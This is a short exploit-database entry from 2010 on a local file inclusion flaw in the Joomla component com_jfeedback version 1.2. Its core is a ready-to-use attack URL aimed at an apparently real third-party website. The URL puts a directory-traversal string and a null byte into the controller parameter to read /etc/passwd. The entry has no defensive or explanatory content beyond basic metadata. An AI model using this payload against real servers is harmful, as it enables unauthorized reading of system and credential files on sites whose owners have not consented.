id: 11718
date: 04/11/2010
title: Joomla Component com_jfeedback Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

=================================================================
Joomla Component com_jfeedback Local File Inclusion Vulnerability
=================================================================

# Exploit Title:
Joomla Component Jfeedback! Local File Inclusion Vulnerability
 
# Date:
April 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://www.joomla.ternaria.com/
 
# Version:
com_jfeedback version 1.2
 
# Tested on:
Linux
 
# Target example
http://www.carrozzeriak1.it/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-24]  #